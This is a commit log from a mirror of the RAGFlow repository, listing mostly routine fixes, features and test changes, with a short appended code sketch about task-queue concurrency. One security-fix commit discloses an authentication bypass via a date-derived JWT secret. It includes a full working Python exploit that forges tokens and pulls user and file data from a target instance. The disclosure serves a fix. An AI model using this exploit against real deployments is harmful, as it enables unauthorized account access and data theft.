ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2026-01-23 03:26:53 +08:00

Author	SHA1	Message	Date
yurhett	9c6c6c51e0	Fix: use jwks_uri from OIDC metadata for JWKS client (#8136 ) ### What problem does this PR solve? Issue: #8051 The current implementation assumes JWKS endpoints follow the standard `/.well-known/jwks.json` convention. This breaks authentication for OIDC providers that use non-standard JWKS paths, resulting in 404 errors during token validation. Root Cause Analysis - The OpenID Connect specification doesn't mandate a fixed path for JWKS endpoints - Some identity providers (like certain Keycloak configurations) use custom endpoints - Our previous approach constructed JWKS URLs by convention rather than discovery ### Solution Approach Instead of constructing JWKS URLs by appending to the issuer URI, we now: 1. Properly leverage the `jwks_uri` from the OIDC discovery metadata 2. Honor the identity provider's actual configured endpoint ```python # Before (fragile approach) jwks_url = f"{self.issuer}/.well-known/jwks.json" # After (standards-compliant) jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:58 +08:00
HaiyangP	baf32ee461	Display only the duplicate column names and corresponding original source. (#8138 ) ### What problem does this PR solve? This PR aims to solve #8120, which requests a better error display for duplicate column names. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:38 +08:00
balibabu	8fb6b5d945	Feat: Add agent operator node from agent form #3221 (#8144 ) ### What problem does this PR solve? Feat: Add agent operator node from agent form #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-09 19:19:48 +08:00
Liu An	5cc2eda362	Test: Refactor test fixtures and add SDK session management tests (#8141 ) ### What problem does this PR solve? - Consolidate HTTP API test fixtures using batch operations (batch_add_chunks, batch_create_chat_assistants) - Fix fixture initialization order in clear_session_with_chat_assistants - Add new SDK API test suite for session management (create/delete/list/update) ### Type of change - [x] Add test cases - [x] Refactoring	2025-06-09 18:13:26 +08:00
balibabu	9a69d5f367	Feat: Display chat content on the agent page #3221 (#8140 ) ### What problem does this PR solve? Feat: Display chat content on the agent page #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-09 18:13:06 +08:00
balibabu	d9b98cbb18	Feat: Convert the prompt field of the agent operator to an array #3221 (#8137 ) ### What problem does this PR solve? Feat: Convert the prompt field of the agent operator to an array #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-09 16:02:33 +08:00
Kevin Hu	24625e0695	Fix: presentation of PDF using vlm. (#8133 ) ### What problem does this PR solve? #8109 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-09 15:01:52 +08:00
Liu An	4649accd54	Test: Add SDK API tests for chat assistant management and improve con… (#8131 ) ### What problem does this PR solve? - Implement new SDK API test cases for chat assistant CRUD operations - Enhance HTTP API concurrent tests to use as_completed for better reliability ### Type of change - [x] Add test cases - [x] Refactoring	2025-06-09 13:30:12 +08:00
Liu An	968ffc7ef3	Refa: dataset operations to simplify error handling (#8132 ) ### What problem does this PR solve? - Consolidate database operations within single try-except blocks in the methods ### Type of change - [x] Refactoring	2025-06-09 13:29:56 +08:00
Stephen Hu	2337bbf6ca	Perf: pass useless check for tidy graph (#8121 ) ### What problem does this PR solve? Support skipping the attribute check when the upstream has already ensured it. ### Type of change - [X] Performance Improvement	2025-06-09 11:44:13 +08:00
Liu An	ad1f89fea0	Fix: chat module update LLM defaults (#8125 ) ### What problem does this PR solve? Previously when LLM.model_name was not configured: - System incorrectly defaulted to 'deepseek-chat' model - This caused permission errors for unauthorized tenants Now: - Use tenant's default chat_model configuration first ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-09 11:44:02 +08:00
Liu An	2ff911b08c	Fix: Set default rerank_model to empty string in Chat class (#8130 ) ### What problem does this PR solve? Previously when LLM.rerank_model was not configured: - SDK would pass None as the value - Database field with null=False constraint would reject it - Caused storage failures for unset rerank_model cases Now: - SDK checks for None value before database operations - Provides empty string as default when rerank_model is unset ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-09 11:43:42 +08:00
Zhichang Yu	1ed0b25910	Fix task_limiter in raptor.py (#8124 ) ### What problem does this PR solve? Fix task_limiter in raptor.py ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-09 10:18:03 +08:00
Liu An	5825a24d26	Test: Refactor test concurrency handling and add SDK chunk management tests (#8112 ) ### What problem does this PR solve? - Improve concurrent test cases by using as_completed for better reliability - Rename variables for clarity (chunk_num -> count) - Add new SDK API test suite for chunk management operations - Update HTTP API tests with consistent concurrency patterns ### Type of change - [x] Add test cases - [x] Refactoring	2025-06-06 19:43:14 +08:00
writinwaters	157cd8b1b0	Docs: Added auto-keyword auto-question guide (#8113 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-06-06 19:27:41 +08:00
balibabu	06463135ef	Feat: Reference the output variable of the upstream operator #3221 (#8111 ) ### What problem does this PR solve? Feat: Reference the output variable of the upstream operator #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-06 19:27:29 +08:00
Kevin Hu	7ed9efcd4e	Fix: QWenCV issue. (#8106 ) ### What problem does this PR solve? Close #8097 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-06 17:55:13 +08:00
balibabu	0bc1f45634	Feat: Enables the message operator form to reference the data defined by the begin operator #3221 (#8108 ) ### What problem does this PR solve? Feat: Enables the message operator form to reference the data defined by the begin operator #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-06 17:54:59 +08:00
balibabu	1885a4a4b8	Feat: Receive reply messages of different event types from the agent #3221 (#8100 ) ### What problem does this PR solve? Feat: Receive reply messages of different event types from the agent #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-06 16:30:18 +08:00
Wanderson Pinto dos Santos	0e03542db5	fix: single task executor getting all tasks from Redis queue (#7330 ) ### What problem does this PR solve? Currently, as long as there are tasks in Redis, this loop keeps fetching them. This leaves a single task executor holding many tasks in the pending state, and we then have to wait for those pending tasks to be put back in the queue. In the first place, if we set `MAX_CONCURRENT_TASKS` to X, then only X tasks should be picked from the queue, and the others should be left in the queue for other `task_executors` or be picked up after one of the slots in the current executor becomes free. This PR ensures this behavior. The additional changes were due to the Ruff linting in pre-commit. But I believe these are expected to keep the coding style. ### Type of change - [X] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe): Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>	2025-06-06 14:32:35 +08:00
Stephen Hu	2e44c3b743	Fix:Unimplemented function in ppt_parser (#8095 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8088 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-06 10:05:58 +08:00
writinwaters	d1ff588d46	Docs: Updated server launching code (#8093 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-06-06 09:48:18 +08:00
Liu An	cc1b2c8f09	Test: add sdk Document test cases (#8094 ) ### What problem does this PR solve? Add sdk document test cases ### Type of change - [x] Add test cases	2025-06-06 09:47:06 +08:00
Liu An	100ea574a7	Fix(python-sdk): Add name filtering support to Dataset.list_documents() (#8090 ) ### What problem does this PR solve? Added name filtering capability for Dataset.list_documents() ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 19:04:35 +08:00
Liu An	92625e1ca9	Fix: document typo in test (#8091 ) ### What problem does this PR solve? fix document typo in test ### Type of change - [x] Typo	2025-06-05 19:03:46 +08:00
Liu An	f007c1c772	Fix: Resolve JSON download errors in Document.download() (#8084 ) ### What problem does this PR solve? An exception is thrown only when the json file has only two keys, `code` and `message`. In other cases, response.content is returned normally. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 18:03:51 +08:00
balibabu	841291dda0	Fix: Fixed an issue where using the new quote markers would cause dialogue output to have delete symbols #7623 (#8083 ) ### What problem does this PR solve? Fix: Fixed an issue where using the new quote markers would cause dialogue output to have delete symbols #7623 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 17:43:28 +08:00
balibabu	6488f22540	Feat: Convert the inputs parameter of the begin operator #3221 (#8081 ) ### What problem does this PR solve? Feat: Convert the inputs parameter of the begin operator #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 16:29:48 +08:00
Stephen Hu	6953ae89c4	Fix:when stream=false，new message without sessionid does no (#8078 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8070 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 15:14:15 +08:00
balibabu	7c7359a9b2	Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 (#8080 ) ### What problem does this PR solve? Feat: Solved the problem that BeginForm would get stuck when modifying data #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 15:12:21 +08:00
Liu An	ee52000870	Test: add sdk Dataset test cases (#8077 ) ### What problem does this PR solve? Add sdk dataset test cases ### Type of change - [x] Add test case	2025-06-05 13:20:28 +08:00
Kevin Hu	91804f28f1	Fix: issue for tavily only in an assistant. (#8076 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 13:00:43 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Stephen Hu	640fca7dc9	Fix: set output for Message template (#8064 ) ### What problem does this PR solve? The streaming logic currently does not match the non-streaming logic, which may cause downstream components to fail to find their upstream components. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:10:40 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Stephen Hu	f819378fb0	Update api_utils.py (#8069 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/8059#issuecomment-2942407486 lazy throw exception to better support custom embedding model ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:05:58 +08:00
balibabu	c163b799d2	Feat: Create empty agent #3221 (#8054 ) ### What problem does this PR solve? Feat: Create empty agent #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-05 12:04:31 +08:00
Liu An	4f3abb855a	Fix: remove zhipu ai api key (#8066 ) ### What problem does this PR solve? - Removed hardcoded Zhipu API key from codebase - New requirement: Tests now require ZHIPU_AI_API_KEY environment variable Example: export ZHIPU_AI_API_KEY=your_api_key_here ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:04:09 +08:00
Mathias Panzenböck	a374816fb2	Don't use '，' (U+FF0C) but ', ' (U+2C U+20) (#8063 ) The Unicode codepoint '，' (U+FF0C) is meant to be used in Chinese text, but this is English text. It looks like a comma followed by a space, but isn't. Of course I didn't change actual Chinese text. ### What problem does this PR solve? Mixup of Unicode characters. This is probably unnoticed by most users, but I wonder if screen readers would read it out differently or if LLMs would trip up on it. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [x] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-06-05 09:29:07 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
Kevin Hu	ec60b322ab	Fix: data missing after upgrading. (#8047 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 16:25:34 +08:00
balibabu	8445143359	Feat: Add RunSheet component #3221 (#8045 ) ### What problem does this PR solve? Feat: Add RunSheet component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 15:56:47 +08:00
天海蒼灆	9938a4cbb6	Feat: Allow update conversation parameters and persist to database in completion (#8039 ) ### What problem does this PR solve? This PR updates the completion function to allow parameter updates when a session_id exists. It also ensures changes are saved back to the database via API4ConversationService. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-04 14:39:04 +08:00
Liu An	73f9c226d3	Fix: Allow None value for parser_config in create_dataset SDK method (#8041 ) ### What problem does this PR solve? Fix parser_config=None handling in create_dataset ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 13:16:32 +08:00
Liu An	52c814b89d	Refa: Move HTTP API tests to top-level test directory (#8042 ) ### What problem does this PR solve? Move test cases only - CI still runs tests under sdk/python ### Type of change - [x] Refactoring	2025-06-04 13:16:17 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
writinwaters	7b268eb134	Docs: Miscellaneous UI updates (#8031 ) ### What problem does this PR solve? ### Type of change - [x] Documentation Update	2025-06-04 09:31:41 +08:00
Adrian Altermatt	31d2b3cb5a	Fix: Grammar and clarity improvements in prompt templates (#8023 ) ## Summary Fixed grammar errors and improved clarity in prompt templates throughout `rag/prompts.py`. ## Changes Made - Fixed incomplete sentence: `"If the user's latest question is completely, don't do anything"` → `"If the user's latest question is already complete, don't do anything"` - Improved phrasing: `"of like [ID:i]"` → `"such as [ID:i]"` - Added missing articles: `"give top 3"` → `"give the top 3"` - Fixed prepositions: `"in language of"` → `"in the same language as"` - Corrected spelling: `"Jappanese"` → `"Japanese"` - Standardized formatting: Consistent role descriptions and punctuation ## Impact These changes improve prompt readability and should make instructions clearer for the underlying language models. ## Test Plan - [x] Verified changes maintain original prompt functionality - [x] No breaking changes to prompt structure or expected outputs Co-authored-by: Adrian Altermatt <adrian.altermatt@fgcz.uzh.ch>	2025-06-03 19:41:59 +08:00
balibabu	ef899a8859	Feat: Add DynamicPrompt component #3221 (#8028 ) ### What problem does this PR solve? Feat: Add DynamicPrompt component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 19:41:35 +08:00
balibabu	e47186cc42	Feat: Add AgentNode component #3221 (#8019 ) ### What problem does this PR solve? Feat: Add AgentNode component #3221 ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-03 17:42:30 +08:00
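
Note on 0e03542db5 (#7330): the behavior described in that message, picking at most `MAX_CONCURRENT_TASKS` tasks and leaving the rest in the queue, can be illustrated with a small sketch. This is not the code from the PR. It assumes an in-memory `asyncio.Queue` as a stand-in for the Redis queue, and `run_executor` and `handle` are hypothetical names introduced only for illustration.

```python
import asyncio

MAX_CONCURRENT_TASKS = 2  # assumed demo value, not the project's setting


async def run_executor(queue, handle, max_concurrent=MAX_CONCURRENT_TASKS):
    """Pull a task only when a slot is free; return the peak number in flight."""
    slots = asyncio.Semaphore(max_concurrent)
    running = set()
    in_flight = 0
    peak = 0

    async def worker(task):
        nonlocal in_flight
        try:
            await handle(task)
        finally:
            in_flight -= 1
            slots.release()  # free the slot so the loop may pull another task

    while True:
        # Reserve a slot BEFORE touching the queue, so tasks that cannot run
        # yet stay queued (and visible to other executors).
        await slots.acquire()
        try:
            task = queue.get_nowait()
        except asyncio.QueueEmpty:
            slots.release()
            break
        in_flight += 1
        peak = max(peak, in_flight)
        job = asyncio.create_task(worker(task))
        running.add(job)
        job.add_done_callback(running.discard)

    if running:
        await asyncio.gather(*running)
    return peak
```

The point of the design is the ordering: a slot is acquired first and the queue is read second, so the executor never holds more tasks than it can run at once.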

3146 Commits